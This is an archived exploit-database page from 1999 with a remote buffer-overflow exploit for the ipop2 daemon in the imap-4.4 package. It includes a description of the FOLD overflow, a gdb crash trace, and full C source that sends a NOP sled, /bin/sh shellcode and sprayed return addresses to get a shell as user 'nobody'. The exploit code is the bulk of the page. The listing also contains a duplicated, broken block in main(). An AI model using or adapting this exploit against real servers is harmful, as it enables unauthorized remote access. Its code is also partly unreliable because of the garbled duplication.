exploit the possibilities

ipop2d.txt

ipop2d.txt
Posted Aug 17, 1999
Authored by Bind

exploit for ipop2 daemons shipped with the imap-4.4 package; remote attackers can spawn a shell with uid of user "nobody". 3.060 kb.

tags | exploit, remote, shell, imap
MD5 | b99db7faac1209b79c3b3a9612b3e14e

ipop2d.txt

Change Mirror Download
Vulnerable Program: POP2 shipped with imap-4.4 package
Platforms: Linux
Impact: Remote users can spawn a shell with uid of user "nobody"
Reported Initally: Chris Evans
Exploit Code: bind <bind@datasurge.net>


Details:
--------
POP-2 supports anonymous proxy service where remote users can connect to
remote imap servers and login with a valid l/p. After authenticated with
the imap server, the command "FOLD" with a buffer of 1002 will completely
overwrite eip. Due to the fact that ipop2 sets the uid to nobody's you
cannot spawn a rootshell :(

.
.
(gdb) run
+ POP2 localhost v4.46 server ready
HELO localhost:b4h p4ssw0rd
#0 messages in {localhost:143/imap/user=bind}INBOX
FOLD AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAA......................... (1002 'A's)

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

(gdb) info all-registers
.
.
esp 0xbffff5ec 0xbffff5ec
ebp 0x41414141 0x41414141
esi 0xbffff605 -1073744379
edi 0x80865ca 134768074
eip 0x41414141 0x41414141
.
.

Exploit Code:
-------------

Pipe output to netcat...

/*
* subipop2d.c (c) 1999 Subterrain Security
*
* Written by bind - June 18, 1999
*
* Vulnerable: ipop2 daemons shipped with the imap-4.4 package
* Compromise: remote users can spawn a shell as user "nobody
*
* Greets: vacuum, xdr & cripto...
*
* Usage:
* ./subipop2 <auth> <user> <pass> [offset] [alignment] [wait]
*
* Try offsets -500...500, alignment option should be between 0 and 4
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define RET 0xbffff718
#define NOP 0x90
#define WAIT 20

char shellcode[] = /* shellcode borrowed from plaguez's imapx.c */
"\xeb\x38\x5e\x89\xf3\x89\xd8\x80\x46\x01\x20\x80\x46\x02\x20\x80"
"\x46\x03\x20\x80\x46\x05\x20\x80\x46\x06\x20\x89\xf7\x83\xc7\x07"
"\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc3\xff\xff\xff\x2f"
"\x42\x49\x4e\x2f\x53\x48\x00";

int main (int argc, char **argv)
{
char buf[1002], *auth, *user, *pass;
int i, offset = 0, align = 0, timeout = WAIT;
unsigned long addr;

if (argc < 4)
{
printf ("usage: %s <auth> <user> <password> [offset] [alignment]"
" [wait]\n",
argv[0]);
exit (1);
}

auth = argv[1];
user = argv[2];
exit (1);
}

auth = argv[1];
user = argv[2];
pass = argv[3];

if (argc > 4) offset = atoi (argv[4]);
if (argc > 5) align = atoi (argv[5]);
if (argc > 6) timeout = atoi (argv[6]);

addr = RET - offset;

memset (buf, NOP, 1002);
memcpy (buf + 500, shellcode, strlen (shellcode));

for (i = (strlen (shellcode) + (600 + align)); i <= 1002; i += 4)
*(long *) &buf[i] = addr;

sleep (2);
printf ("HELO %s:%s %s\n", auth, user, pass);
sleep (timeout);
printf ("FOLD %s\n", buf);

}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close